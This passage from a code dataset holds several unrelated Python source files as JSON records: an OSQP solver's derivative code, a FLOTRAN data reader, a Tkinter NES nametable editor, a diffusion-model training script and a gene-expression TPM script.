argument\n expectedProject = ('', 'Makefile', 'MinGW Makefiles',\n 'Unix Makefiles', 'CodeBlocks', 'Xcode')\n if project_type not in expectedProject:\n raise ValueError(\"Unknown value of 'project_type' argument.\")\n\n if project_type == 
'Makefile':\n if system() == 'Windows':\n project_type = 'MinGW Makefiles'\n elif system() == 'Linux' or system() == 'Darwin':\n project_type = 'Unix Makefiles'\n\n # Convert workspace to Python\n sys.stdout.write(\"Getting workspace from OSQP object... \\t\\t\\t\\t\")\n sys.stdout.flush()\n work = self._model._get_workspace()\n print(\"[done]\")\n\n # Generate code with codegen module\n cg.codegen(work, folder, python_ext_name, project_type, compile_python_ext,\n embedded, force_rewrite, float_flag, long_flag)\n\n def derivative_iterative_refinement(self, rhs, max_iter=20, tol=1e-12):\n M = self._derivative_cache['M']\n\n # Prefactor\n solver = self._derivative_cache['solver']\n\n sol = solver.solve(rhs)\n for k in range(max_iter):\n delta_sol = solver.solve(rhs - M @ sol)\n sol = sol + delta_sol\n\n if np.linalg.norm(M @ sol - rhs) < tol:\n break\n\n if k == max_iter - 1:\n warn(\"max_iter iterative refinement reached.\")\n\n return sol\n\n def adjoint_derivative(self, dx=None, dy_u=None, dy_l=None,\n P_idx=None, A_idx=None, eps_iter_ref=1e-04):\n \"\"\"\n Compute adjoint derivative after solve.\n \"\"\"\n\n P, q = self._derivative_cache['P'], self._derivative_cache['q']\n A = self._derivative_cache['A']\n l, u = self._derivative_cache['l'], self._derivative_cache['u']\n\n try:\n results = self._derivative_cache['results']\n except KeyError:\n raise ValueError(\"Problem has not been solved. \"\n \"You cannot take derivatives. \"\n \"Please call the solve function.\")\n\n if results.info.status != \"solved\":\n raise ValueError(\"Problem has not been solved to optimality. \"\n \"You cannot take derivatives\")\n\n m, n = A.shape\n x = results.x\n y = results.y\n y_u = np.maximum(y, 0)\n y_l = -np.minimum(y, 0)\n\n if A_idx is None:\n A_idx = A.nonzero()\n\n if P_idx is None:\n P_idx = P.nonzero()\n\n if dy_u is None:\n dy_u = np.zeros(m)\n if dy_l is None:\n dy_l = np.zeros(m)\n\n # Make sure M matrix exists\n if 'M' not in self._derivative_cache:\n # Multiply second-third row by diag(y_u)^-1 and diag(y_l)^-1\n # to make the matrix symmetric\n inv_dia_y_u = spa.diags(np.reciprocal(y_u + 1e-20))\n inv_dia_y_l = spa.diags(np.reciprocal(y_l + 1e-20))\n M = spa.bmat([\n [P, A.T, -A.T],\n [A, spa.diags(A @ x - u) @ inv_dia_y_u, None],\n [-A, None, spa.diags(l - A @ x) @ inv_dia_y_l]\n ], format='csc')\n delta = spa.bmat([[eps_iter_ref * spa.eye(n), None],\n [None, -eps_iter_ref * spa.eye(2 * m)]],\n format='csc')\n self._derivative_cache['M'] = M\n self._derivative_cache['solver'] = qdldl.Solver(M + delta)\n\n rhs = - np.concatenate([dx, dy_u, dy_l])\n\n r_sol = self.derivative_iterative_refinement(rhs)\n\n r_x, r_yu, r_yl = np.split(r_sol, [n, n+m])\n\n # Extract derivatives for the constraints\n rows, cols = A_idx\n dA_vals = (y_u[rows] - y_l[rows]) * r_x[cols] + \\\n (r_yu[rows] - r_yl[rows]) * x[cols]\n dA = spa.csc_matrix((dA_vals, (rows, cols)), shape=A.shape)\n du = - r_yu\n dl = r_yl\n\n # Extract derivatives for the cost (P, q)\n rows, cols = P_idx\n dP_vals = .5 * (r_x[rows] * x[cols] + r_x[cols] * x[rows])\n dP = spa.csc_matrix((dP_vals, P_idx), shape=P.shape)\n dq = r_x\n\n return (dP, dq, dA, dl, du)\n"} {"ext": "py", "sha": "1a2f24660a7e35fffbe34868aabb5aba18a8303c", "content": "\"\"\"\nBase interface for a reader class\n\"\"\"\nimport numpy as np\nimport logging\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\nimport PyFLOTRAN.utils.SubFishModule as subfish\nimport seaborn as sns\n\nclass BaseReader:\n data: 
np.ndarray # Hint of self.data array\n info: dict\n\n def __init__(self, filename=None, header=False, **kwargs):\n self.filename = Path(filename)\n self.info = {\"reader\": {}}\n self.data = None\n self.header = header\n self.__dict__.update(kwargs)\n self.open_file(filename)\n\n def read_file(self, opened_file):\n \"\"\"\n Reads the data and stores it inside the class\n :return:\n \"\"\"\n pass\n\n def open_file(self, filename):\n with open(filename) as opened_file:\n if self.header:\n opened_file.readline() # For now, skips the header if it has\n self.read_file(opened_file)\n self.build_info()\n\n def read_header(self, opened_file):\n \"\"\"\n Reads the header of the file\n :return:\n \"\"\"\n pass\n\n def get_data(self) -> np.ndarray:\n \"\"\"\n Outputs the read data\n :return:\n \"\"\"\n return np.array(0)\n\n def build_info(self):\n \"\"\"\n Generates a dictionary containing the basic info of the read data\n :return:\n \"\"\"\n self.info = {}\n\n def global_coords_to_local(self, x_local_to_global, y_local_to_global):\n \"\"\"Converts global data coordinates into local\"\"\"\n assert len(self.data.shape) >= 2 and self.data.shape[1] >= 2, \"Error in data shape\"\n self.data[:, 0] -= x_local_to_global\n self.data[:, 1] -= y_local_to_global\n\n def local_coords_to_global(self, x_local_to_global, y_local_to_global):\n \"\"\"Converts local data coordinates into global\"\"\"\n assert len(self.data.shape) >= 2 and self.data.shape[1] >= 2, \"Error in data shape\"\n self.data[:, 0] += x_local_to_global\n self.data[:, 1] += y_local_to_global\n\n def dump_to_csv(self, output_file, delimiter=\",\"):\n \"\"\"\n Writes the data into a csv file\n :param output_file:\n :return:\n \"\"\"\n print(f\"Starting dump into {output_file}\")\n np.savetxt(output_file, self.get_data(), delimiter=delimiter)\n print(f\"The data has been properly exported to the {output_file} file\")\n\n def create_postprocess_dict(self):\n self.postprocessing_dict = Path().cwd() / \"postprocess\"\n self.postprocessing_dict.mkdir(exist_ok=True)\n\n def generate_subfish_data(self, subfish_dict: dict, unit_factor=1/(365 * 24), unit_name='d') -> pd.DataFrame:\n \"\"\"\n This method reads a given subfish dict and returns the calculated results\n Args:\n subfish_dict: dictionary containing subfish module parameters\n unit_factor: factor multiplyin the results (originally computed in seconds)\n Returns:\n Array containing the times and computed values\n \"\"\"\n if not subfish_dict:\n raise AttributeError('Please, provide a suitable subfish dict object')\n tang_sol = subfish.calculate_tang(subfish_dict)\n tang_sol[0] *= unit_factor\n tang_sol_pd = pd.DataFrame({f'Time [{unit_name}]': tang_sol[0],\n 'Result [M]': tang_sol[1]\n }\n )\n return tang_sol_pd\n"} {"ext": "py", "sha": "1a2f2588b7582d94c297c6556a389c0cf55ecef5", "content": "#!/usr/bin/env python\nfrom __future__ import with_statement, division\nfrom Tkinter import Tk, Frame, Button, Canvas, Label, NW\nfrom array import array\nfrom PIL import Image as PILImage, ImageTk, ImageDraw\n\ndef tileFromPlanar(s, opaqueBase=0):\n nPlanes = len(s) // 8\n im = PILImage.new('P', (8, 8))\n pixels = im.load()\n if pixels is None:\n print \"Ouch!\", repr(im)\n for y in range(8):\n planedata = [ord(c) for c in s[y::8]]\n for x in range(8):\n c = 0\n for i in range(nPlanes):\n if planedata[i] & (0x80 >> x):\n c |= 1 << i\n pixels[x, y] = c + opaqueBase if c > 0 else c\n return im\n\ndef renderAttrPicker(tileImg, palette, value):\n im = PILImage.new('P', (128, 32))\n im.putpalette(palette)\n for i 
in range(4):\n x = i * 32\n t = 0 if i == value else 3\n im.paste(i * 4 + 1, (x + 16, t, x + 32 - t, 16))\n im.paste(i * 4 + 2, (x + t, 16, x + 16, 32 - t))\n im.paste(i * 4 + 3, (x + 16, 16, x + 32 - t, 32 - t))\n im.paste(tileImg.resize((16, 16)), (value * 32, 0))\n #im.show()\n return im\n\ndef renderChrFile(tiledata, palette, opaqueBase=0):\n tiles = [tiledata[i:i + 16] for i in range(0, len(tiledata), 16)]\n rows = [tiles[i:i + 16] for i in range(0, len(tiles), 16)]\n h = len(rows) * 8\n w = 128\n\n im = PILImage.new('P', (w, h))\n y = 0\n #palette = [0, 0, 0, 153, 102, 0, 102, 204, 0, 255, 204, 0]\n im.putpalette(palette)\n for row in rows:\n x = 0\n for tiledata in row:\n tile = tileFromPlanar(tiledata, opaqueBase)\n im.paste(tile, (x, y))\n x += 8\n y += 8\n return im\n\nclass NamFile:\n defaultNESPalette = \\\n \"\\x0f\\x00\\x10\\x30\\x0f\\x12\\x1a\\x30\\x0f\\x1a\\x2c\\x30\\x0f\\x12\\x14\\x30\"\n nesclut = [\n (0x80,0x80,0x80), (0x00,0x00,0xBB), (0x37,0x00,0xBF), (0x84,0x00,0xA6),\n (0xBB,0x00,0x6A), (0xB7,0x00,0x1E), (0xB3,0x00,0x00), (0x91,0x26,0x00),\n (0x7B,0x2B,0x00), (0x00,0x3E,0x00), (0x00,0x48,0x0D), (0x00,0x3C,0x22),\n (0x00,0x2F,0x66), (0x00,0x00,0x00), (0x05,0x05,0x05), (0x05,0x05,0x05),\n\n (0xC8,0xC8,0xC8), (0x00,0x59,0xFF), (0x44,0x3C,0xFF), (0xB7,0x33,0xCC),\n (0xFF,0x33,0xAA), (0xFF,0x37,0x5E), (0xFF,0x37,0x1A), (0xD5,0x4B,0x00),\n (0xC4,0x62,0x00), (0x3C,0x7B,0x00), (0x1E,0x84,0x15), (0x00,0x95,0x66),\n (0x00,0x84,0xC4), (0x11,0x11,0x11), (0x09,0x09,0x09), (0x09,0x09,0x09),\n\n (0xFF,0xFF,0xFF), (0x00,0x95,0xFF), (0x6F,0x84,0xFF), (0xD5,0x6F,0xFF),\n (0xFF,0x77,0xCC), (0xFF,0x6F,0x99), (0xFF,0x7B,0x59), (0xFF,0x91,0x5F),\n (0xFF,0xA2,0x33), (0xA6,0xBF,0x00), (0x51,0xD9,0x6A), (0x4D,0xD5,0xAE),\n (0x00,0xD9,0xFF), (0x66,0x66,0x66), (0x0D,0x0D,0x0D), (0x0D,0x0D,0x0D),\n\n (0xFF,0xFF,0xFF), (0x84,0xBF,0xFF), (0xBB,0xBB,0xFF), (0xD0,0xBB,0xFF),\n (0xFF,0xBF,0xEA), (0xFF,0xBF,0xCC), (0xFF,0xC4,0xB7), (0xFF,0xCC,0xAE),\n (0xFF,0xD9,0xA2), (0xCC,0xE1,0x99), (0xAE,0xEE,0xB7), (0xAA,0xF7,0xEE),\n (0xB3,0xEE,0xFF), (0xDD,0xDD,0xDD), (0x11,0x11,0x11), (0x11,0x11,0x11)\n ]\n\n def __init__(self, chrfilename, palfilename='', namfilename=None):\n self.loadchr(chrfilename)\n self.loadpal(palfilename)\n self.loadnam(namfilename)\n\n def loadchr(self, chrfilename):\n with open(chrfilename, 'rb') as infp:\n chrdata = infp.read(4096)\n self.chrdata = chrdata\n if len(self.chrdata) != 4096:\n raise ValueError(\"not enough data for pattern table\")\n\n def loadpal(self, palfilename):\n self.palfilename = palfilename\n try:\n with open(palfilename, 'rb') as infp:\n pal = infp.read(16)\n if len(paldata) != 16:\n raise ValueError(\"not enough data for palette\")\n except IOError, e:\n import errno\n if e.errno in (errno.ENOENT, errno.EINVAL):\n pal = self.defaultNESPalette\n else:\n raise\n self.clut = []\n for c in pal:\n self.clut.extend(self.nesclut[ord(c) & 0x3F])\n \n def loadnam(self, namfilename):\n print \"namfilename is\", namfilename\n if namfilename is not None:\n try:\n with open(namfilename, 'rb') as infp:\n namdata = infp.read(1152)\n if ((len(namdata) != 1024\n and namdata.startswith('\\x04\\x00'))\n or namfilename.lower().endswith('.pkb')):\n print \"unpacking\"\n namdata = UnPackBits(namdata[2:]).flush().tostring()\n if len(namdata) != 1024:\n raise ValueError(\"not enough data for nametable\")\n self.namdata = array('B', namdata)\n except IOError, e:\n import errno\n if e.errno == errno.ENOENT:\n namfilename = None\n else:\n raise\n if namfilename is None:\n 
self.namdata = array('B', [0 for i in range(1024)])\n self.namfilename = namfilename\n self.setUnsaved(False)\n\n def setUnsaved(self, isSaved):\n import datetime\n self.unsaved = (datetime.datetime.now()\n if isSaved\n else False)\n\n def savenam(self, namfilename=None):\n if namfilename is None:\n namfilename = self.namfilename\n s = self.namdata.tostring()\n if namfilename.lower().endswith('.pkb'):\n s = \"\\x04\\x00\" + PackBits(s).flush().tostring()\n with open(namfilename, 'wb') as outfp:\n outfp.write(s)\n self.namfilename = namfilename\n self.setUnsaved(False)\n\n def getTile(self, x, y):\n if x < 0 or x >= 32 or y < 0 or y >= 30:\n return None\n nameIdx = y * 32 + x\n tileNo = self.namdata[nameIdx]\n attrIdx = (y >> 2) * 8 + (x >> 2) + 960\n attrShift = ((y & 0x02) << 1) | (x & 0x02)\n attrNo = (self.namdata[attrIdx] >> attrShift) & 0x03\n return (tileNo, attrNo)\n\n def setTile(self, x, y, tileNo, attrNo=None):\n if x < 0 or x >= 32 or y < 0 or y >= 30:\n return\n nameIdx = y * 32 + x\n self.namdata[nameIdx] = tileNo\n if attrNo is not None:\n attrIdx = (y >> 2) * 8 + (x >> 2) + 960\n attrShift = ((y & 0x02) << 1) | (x & 0x02)\n attrByte = (attrNo & 0x03) << attrShift\n attrByte |= self.namdata[attrIdx] & ~(0x03 << attrShift)\n self.namdata[attrIdx] = attrByte\n \n def getTileData(self, tileNo):\n return self.chrdata[tileNo * 16:tileNo * 16 + 16]\n\n def renderTile(self, tileNo, attrNo):\n return tileFromPlanar(self.getTileData(tileNo), attrNo * 4)\n\ndef build_menubar(parent, mbardata):\n from Tkinter import Menu\n menubar = Menu(parent)\n parent.config(menu=menubar)\n menus = []\n for (label, items) in mbardata:\n menu = Menu(menubar)\n menus.append(menu)\n menubar.add_cascade(label=label, menu=menu)\n for item in items:\n if item == '-':\n menu.add_separator()\n else:\n label = item[0]\n underline = label.find('&')\n if underline >= 0:\n label = label[:underline] + label[underline+1:]\n else:\n underline = None\n accelerator = item[2] if len(item) > 2 else None\n menu.add_command(label=label, command=item[1],\n accelerator=accelerator,\n underline=underline)\n return (menubar, menus)\n\nclass TilePicker(Frame):\n def __init__(self, parent, doc, **kw):\n apply(Frame.__init__, (self, parent), kw)\n self.doc = doc\n self.tilePicker = None\n self.attrPicker = None\n self.status = None\n self.curTile = 0\n self.setAttribute(0)\n self.tilePicker = Label(self, image=self.tilePickerPI,\n width=128, borderwidth=0)\n self.tilePicker.grid(row=0,column=0)\n self.tilePicker.bind(\"\", self.tilePickerCallback)\n self.attrPicker = Label(self, image=self.attrPickerPI,\n borderwidth=0)\n self.attrPicker.grid(row=1,column=0)\n self.attrPicker.bind(\"\", self.attrPickerCallback)\n self.status = Label(self)\n self.status.grid(row=2,column=0)\n self.setStatus()\n\n def setAttribute(self, value):\n self.curAttribute = value & 0x03\n self.updateWidgets()\n\n def updateWidgets(self):\n self.tilePickerImage = renderChrFile(self.doc.chrdata,\n self.doc.clut,\n self.curAttribute * 4)\n self.tilePickerPI = ImageTk.PhotoImage(self.tilePickerImage)\n if self.tilePicker is not None:\n self.tilePicker.configure(image=self.tilePickerPI)\n\n previewTile = self.doc.renderTile(self.curTile, self.curAttribute)\n self.attrPickerImage = renderAttrPicker(previewTile,\n self.doc.clut,\n self.curAttribute)\n self.attrPickerPI = ImageTk.PhotoImage(self.attrPickerImage)\n if self.attrPicker is not None:\n self.attrPicker.configure(image=self.attrPickerPI)\n \n self.setStatus()\n\n def setTile(self, tile):\n self.curTile 
= tile\n self.setAttribute(self.curAttribute)\n\n def setStatus(self):\n if self.status is None:\n return\n label = \"tile $%02x attr %d\" % (self.curTile, self.curAttribute)\n self.status.configure(text=label)\n\n def tilePickerCallback(self, event):\n if event.x >= 0 and event.x < 128 and event.y >= 0 and event.y < 128:\n tileX = event.x // 8\n tileY = event.y // 8\n newTileNo = tileY * 16 + tileX\n #print \"mouse was clicked on tile\", newTileNo\n self.setTile(newTileNo)\n return\n print \"mouse was clicked at (%d, %d)\" % (event.x, event.y)\n\n def attrPickerCallback(self, event):\n if event.x >= 0 and event.x < 128:\n attr = event.x // 32\n #print \"mouse was clicked on attribute\", attr\n self.setAttribute(attr)\n return\n print \"mouse was clicked at (%d, %d)\" % (event.x, event.y)\n\nclass NamDisplay(Canvas):\n def __init__(self, parent, doc, **kw):\n kw['width'] = 512\n kw['height'] = 480\n kw['relief']='raised'\n kw['highlightthickness'] = 0\n apply(Canvas.__init__, (self, parent), kw)\n self.doc = doc\n self.tile = []\n im = PILImage.new('RGB', (32, 32))\n for y in range(15):\n row = []\n for x in range(16):\n tile = ImageTk.PhotoImage(im)\n if True or ((x ^ y) & 1) == 0:\n self.create_image(x * 32, y * 32, image=tile, anchor=NW)\n row.append(tile)\n self.tile.append(row)\n self.updating = False\n self.updScreen()\n\n def updScreen(self):\n self.updating = True\n for y in range(0, 30, 2):\n for x in range(0, 32, 2):\n self.updTile(x, y)\n self.updating = False\n self.update_idletasks()\n\n def updTile(self, x, y):\n if x < 0 or x >= 32 or y < 0 or y >= 30:\n return\n y = y & ~1\n x = x & ~1\n im = PILImage.new('RGB', (32, 32))\n dst = self.tile[y >> 1][x >> 1]\n for y1 in range(2):\n for x1 in range(2):\n (tileNo, attrNo) = self.doc.getTile(x + x1, y + y1)\n tile = self.doc.renderTile(tileNo, attrNo).resize((16, 16))\n tile.putpalette(self.doc.clut)\n im.paste(tile, (x1 * 16, y1 * 16))\n dst.paste(im)\n if not self.updating:\n self.update_idletasks()\n\nclass PackBits():\n def __init__(self, toWrite=''):\n self.bytes = array('b')\n self.closed = False\n self.mode = 'wb'\n self.name = ''\n self.newlines = None\n if toWrite:\n self.write(toWrite)\n\n def close(self):\n self.bytes = None\n self.closed = True\n\n def write(self, s):\n \"\"\"Add a string to the buffer.\"\"\"\n if not self.closed:\n self.bytes.fromstring(s)\n\n def tell(self):\n return len(self.bytes)\n\n def truncate(self, length):\n if not self.closed:\n del self[length:]\n\n def writelines(self, seq):\n \"\"\"Add a sequence of strings to the buffer.\"\"\"\n self.write(''.join(seq))\n\n def flush(self):\n \"\"\"Compress the data to a file.\"\"\"\n i = 0\n base = 0\n out = array('b')\n while base < len(self.bytes):\n\n # measure the run starting at t\n i = 1\n imax = min(128, len(self.bytes) - base)\n basebyte = self.bytes[base]\n while (i < imax\n and basebyte == self.bytes[base + i]):\n i += 1\n # if the run is either length 3 or to the end of the file,\n # write it\n if i > 2 or base + i == len(self.bytes):\n out.append(1 - i)\n out.append(self.bytes[base])\n base += i\n continue\n\n # measure the nonrun starting at t\n i = 1\n imax = min(128, len(self.bytes) - base)\n while (i < imax\n and (base + i + 2 >= len(self.bytes)\n or self.bytes[base + i] != self.bytes[base + i + 1]\n or self.bytes[base + i] != self.bytes[base + i + 2])):\n i += 1\n out.append(i - 1)\n out.extend(self.bytes[base:base + i])\n base += i\n return out\n\n @staticmethod\n def test():\n pb = PackBits('stopping stoppping stopppppi')\n data = 
pb.flush()\n print repr(data)\n\nclass UnPackBits(PackBits):\n def flush(self):\n out = array('b')\n base = 0\n while base < len(self.bytes):\n c = self.bytes[base]\n if c > 0 and c <= 127:\n b = self.bytes[base + 1]\n out.extend(self.bytes[base + 1:base + c + 2])\n base += 2 + c\n elif c >= -127:\n b = self.bytes[base + 1]\n out.fromlist([b] * (1 - c))\n base += 2\n return out\n\n @staticmethod\n def test():\n start = 'stopping stoppping stopppppi'\n packed = PackBits(start).flush().tostring()\n print repr(packed)\n unpacked = UnPackBits(packed).flush().tostring()\n print repr(unpacked)\n print \"pass\" if start == unpacked else \"fail\"\n \n\nclass App:\n filetypes = [\n ('NES nametable', '*.nam'),\n ('NES compressed nametable', '*.pkb'),\n ('PNG image', '*.png'),\n ('GIF image', '*.gif'),\n ('Windows bitmap', '*.bmp')\n ]\n\n def __init__(self, w, doc):\n import sys\n self.window = w\n self.doc = doc\n mbardata = [\n (\"File\", [\n (\"&New Nametable\", lambda: self.file_new_nam(), \"Ctrl+N\"),\n (\"&Open Nametable...\", lambda: self.file_open_nam(), \"Ctrl+O\"),\n (\"Open &Pattern Table...\", lambda: self.file_open_chr(), \"Ctrl+L\"),\n '-',\n (\"&Save\", lambda: self.file_save_nam(), \"Ctrl+S\"),\n (\"Save &As...\", lambda: self.file_save_nam_as(), \"Ctrl+A\"),\n '-',\n (\"E&xit\", lambda: self.file_quit(), \"Ctrl+Q\")\n ]),\n (\"Help\", [\n (\"&About...\", lambda: self.about())\n ])\n ]\n (menubar, menus) = build_menubar(w, mbardata)\n w.bind(\"\", lambda e: self.file_new_nam())\n w.bind(\"\", lambda e: self.file_new_nam())\n w.bind(\"\", lambda e: self.file_open_nam())\n w.bind(\"\", lambda e: self.file_open_nam())\n w.bind(\"\", lambda e: self.file_open_chr())\n w.bind(\"\", lambda e: self.file_open_chr())\n w.bind(\"\", lambda e: self.file_save_nam())\n w.bind(\"\", lambda e: self.file_save_nam())\n w.bind(\"\", lambda e: self.file_quit())\n w.bind(\"\", lambda e: self.file_quit())\n\n self.tilePicker = TilePicker(w, doc)\n self.tilePicker.grid(row=0,column=0, sticky=NW)\n self.namDisplay = NamDisplay(w, doc, borderwidth=0)\n self.namDisplay.grid(row=0,column=1)\n self.namDisplay.bind(\"\", self.namPickupCallback)\n self.namDisplay.bind(\"\", self.namPickupCallback)\n self.namDisplay.bind(\"\", self.namWriteCallback)\n self.namDisplay.bind(\"\", self.namWriteCallback)\n w.wm_resizable(0,0)\n self.updWindowTitle()\n\n def namPickupCallback(self, event):\n if event.x >= 0 and event.x < 512 and event.y >= 0 and event.y < 512:\n x = event.x // 16\n y = event.y // 16\n (tile, attribute) = self.doc.getTile(x, y)\n self.tilePicker.curTile = tile\n self.tilePicker.setAttribute(attribute)\n return\n \n def namWriteCallback(self, event):\n if event.x >= 0 and event.x < 512 and event.y >= 0 and event.y < 512:\n x = event.x // 16\n y = event.y // 16\n t = self.tilePicker.curTile\n a = self.tilePicker.curAttribute\n self.doc.setTile(x, y, t, a)\n if not self.doc.unsaved:\n self.doc.setUnsaved(True)\n self.updWindowTitle()\n self.namDisplay.updTile(x, y)\n return\n\n def updWindowTitle(self):\n nfn = self.doc.namfilename\n if nfn is None:\n nfn = 'untitled'\n if self.doc.unsaved:\n nfn = '*' + nfn\n appname = '8name II'\n title = ' - '.join((nfn, appname))\n self.window.title(title)\n \n def file_new_nam(self):\n print \"File > New Nametable\"\n\n def file_open_nam(self):\n from tkFileDialog import askopenfilename\n filename = askopenfilename(parent=root,\n filetypes=self.filetypes,\n initialfile=self.doc.namfilename,\n title=\"Open Nametable\")\n print \"file open nam: filename is\", filename\n 
if not isinstance(filename, basestring):\n return\n self.doc.loadnam(filename)\n self.namDisplay.updScreen()\n self.updWindowTitle()\n\n def file_open_chr(self):\n from tkFileDialog import askopenfilename\n filename = askopenfilename(parent=root,\n filetypes=[('Pattern Table', '*.chr')],\n initialfile=self.doc.namfilename,\n title=\"Open Pattern Table\")\n if not isinstance(filename, str):\n return\n self.doc.loadchr(filename)\n self.tilePicker.updateWidgets()\n self.namDisplay.updScreen()\n\n def file_save_nam(self):\n if self.doc.namfilename is None:\n return self.file_save_nam_as()\n self.doc.savenam()\n self.updWindowTitle()\n\n def file_save_nam_as(self):\n from tkFileDialog import asksaveasfilename\n filename = asksaveasfilename(parent=root,\n filetypes=self.filetypes,\n title=\"Save Nametable As\")\n ext = filename[-4:].lower()\n if ext in ('.png', '.gif', '.bmp'):\n print \"Would save image to\", filename\n else:\n self.doc.savenam(filename)\n self.updWindowTitle()\n\n def file_quit(self):\n self.window.destroy()\n\nroot = Tk()\napp = App(root, NamFile('../spritecans.chr'))\nroot.mainloop()\nprint \"remain:\"\nprint \"1. implement image saving\"\nprint \"2. implement and test loading\"\nprint \"3. implement and test compressed pkb support\"\nprint \"4. Implement stub methods for File menu items\"\nprint \"5. Warn on closing document where doc.unsaved is not False\"\nprint \"6. Write palette editor\"\n"} {"ext": "py", "sha": "1a2f2709e216f80da7171499ad9a4b12bdbb6cb6", "content": "# Write a Python program to find out the number of CPUs using.\nimport multiprocessing\nprint(multiprocessing.cpu_count())\n"} {"ext": "py", "sha": "1a2f275364493555282f3be31fdd27bafcd03635", "content": "from denoising_diffusion_pytorch import Unet, GaussianDiffusion, Trainer\nimport os\n\ndef main(train):\n if train==True:\n model = Unet(\n dim = 128,\n dim_mults = (1, 2, 2, 2)\n ).cuda()\n\n diffusion = GaussianDiffusion(\n model,\n image_size = 32,\n timesteps = 1000, # number of steps\n loss_type = 'l2' # L1 or L2\n ).cuda()\n\n trainer = Trainer(\n diffusion,\n '/home/congen/code/geoml_gan/data/cifar10',\n train=True,\n dataset_name='cifar10',\n image_size=32,\n train_batch_size = 64,\n train_lr = 2e-4,\n train_num_steps = 500001, # total training steps\n gradient_accumulate_every = 2, # gradient accumulation steps\n ema_decay = 0.9999, # exponential moving average decay\n fp16 = True # turn on mixed precision training with apex\n )\n #trainer.load(20)\n trainer.train()\n else:\n\n model = Unet(\n dim=128,\n dim_mults=(1, 2, 2, 2)\n ).cuda()\n\n diffusion = GaussianDiffusion(\n model,\n image_size=32,\n timesteps=1000, # number of steps\n loss_type='l2' # L1 or L2\n ).cuda()\n\n trainer = Trainer(\n diffusion,\n '/home/congen/code/geoml_gan/data/cifar10',\n train=False,\n dataset_name='cifar10',\n image_size=32,\n train_batch_size=64,\n train_lr=2e-4,\n train_num_steps=200001, # total training steps\n gradient_accumulate_every=2, # gradient accumulation steps\n ema_decay=0.9999, # exponential moving average decay\n fp16=True # turn on mixed precision training with apex\n )\n trainer.test()\n\n\n\"\"\"\n Usage:\n\n export CUDA_VISIBLE_DEVICES=2\n export PORT=6006\n export CUDA_HOME=/opt/cuda/cuda-10.2\n export TIME_STR=1\n python train.py \n\n\n :return:\n \"\"\"\nif __name__ == '__main__':\n if 'CUDA_VISIBLE_DEVICES' not in os.environ:\n os.environ['CUDA_VISIBLE_DEVICES'] = '2'\n main(False)"} {"ext": "py", "sha": "1a2f27d2d5ea5b56f238e84a811160b2415bf74c", "content": "# get human_ebv_tpms.py\nimport 
pandas as pd\nimport argparse\nimport os\nimport math\nimport datetime\nimport subprocess\n\n# get basename from a file and path string\ndef get_basename(filepath):\n import os\n return os.path.basename(os.path.splitext(filepath)[0]) \n\n# get and format output directory\ndef format_odir(odir):\n import os\n cwd = os.getcwd()\n\n if odir != '':\n # if first character is not /, use cwd to make this an absolute path\n if odir[0] != '/' and odir[0] != '~':\n odir = cwd+odir\n if odir[-1] != '/':\n odir += '/'\n return odir\n\n# make a dated output directory for the files used for the tracks\ndef make_dated_folder(odir, bname):\n date = datetime.datetime.now()\n date = date.strftime('%y%m%d')\n odir = odir+date+'_'+bname+'_figures/'\n\n if not os.path.isdir(odir):\n print('Making output directory '+odir)\n os.makedirs(odir)\n return odir\n\n# get value associated with keyword in the 9th column of gtf\ndef get_field_value(key, fields):\n if key not in fields:\n return None\n else:\n return fields.split(key+' \"')[1].split()[0].replace('\";','')\n\n# calculate tpm for a column in the abundance table\ndef get_tpm(df, col):\n\tnew_col = 'TPM_'+col\n\ttotal_reads = df[d].sum()\n\tdf[new_col] = df.apply(lambda x: float(x[d]*1000000)/total_reads, axis=1)\n\n\treturn new_col, df\n\n# calculate tpm for a column in the abundance table\ndef get_log_tpm(df, col, gene):\n\ttpm_col = 'TPM_'+col\n\tif not gene:\n\t\tnew_col = 'log_'+tpm_col\n\telse:\n\t\tnew_col = 'gene_log_'+TPM_col\n\tdf[new_col] = df.apply(lambda x: math.log2(x[tpm_col]+1), axis=1)\n\n\treturn new_col, df\n\n# get gtf file name \nparser = argparse.ArgumentParser(description='removes EBV transcripts from GTF file')\nparser.add_argument('--human_gtf', help='GTF with human and EBV data')\nparser.add_argument('--human_filt_ab', help='Filtered abundance file with human and EBV data')\nparser.add_argument('--human_ab', help='Unfiltered abundance file with human and EBV data')\nparser.add_argument('--ebv_filt_ab', help='EBV only filtered abundance file')\nparser.add_argument('--ebv_ab', help='EBV only unfiltered abundance file')\nparser.add_argument('--datasets', help='Comma-separated list of dataset names to use for human+ebv data')\nparser.add_argument('--o', help='Prefix for output file')\n\nargs = parser.parse_args()\n\nfull_gtf = args.human_gtf\nfull_ab = args.human_filt_ab\nfull_unf_ab = args.human_ab\nebv_ab = args.ebv_filt_ab\nebv_unf_ab = args.ebv_ab\n\nmy_datasets = args.datasets.split(',')\n\noprefix = args.o\n\n# get all human transcript ids\ninfile = open(full_gtf, 'r')\nhuman_tids = []\nebv_tids = []\nfor i, line in enumerate(infile): \n line = line.replace('\\n', '')\n temp = line.split('\\t')\n fields = temp[-1]\n\n if temp[0] != 'chrEBV' and temp[2] == 'transcript':\n human_tids.append(get_field_value('talon_transcript', fields))\n elif temp[0] == 'chrEBV' and temp[2] == 'transcript':\n ebv_tids.append(get_field_value('talon_transcript', fields))\n \nfull_df = pd.read_csv(full_ab, sep='\\t')\nebv_df = pd.read_csv(ebv_ab, sep='\\t')\n\n# reformat human table\n# dc_datasets = ['D4', 'D5', 'D10', 'D11']\ndatasets = my_datasets\n# full_df.drop(dc_datasets, inplace=True, axis=1) # drop datasets we don't want\nfull_df = full_df.loc[full_df[datasets].sum(axis=1) != 0] # drop transcripts with no reads in datasets we do want\nfull_df = full_df.loc[full_df['transcript_ID'].isin(human_tids)] # drop ebv transcripts\nfull_df['ebv'] = 'Human' # give human/ebv designation\nfull_df = full_df.loc[full_df.transcript_novelty != 'Genomic']\n\n# 
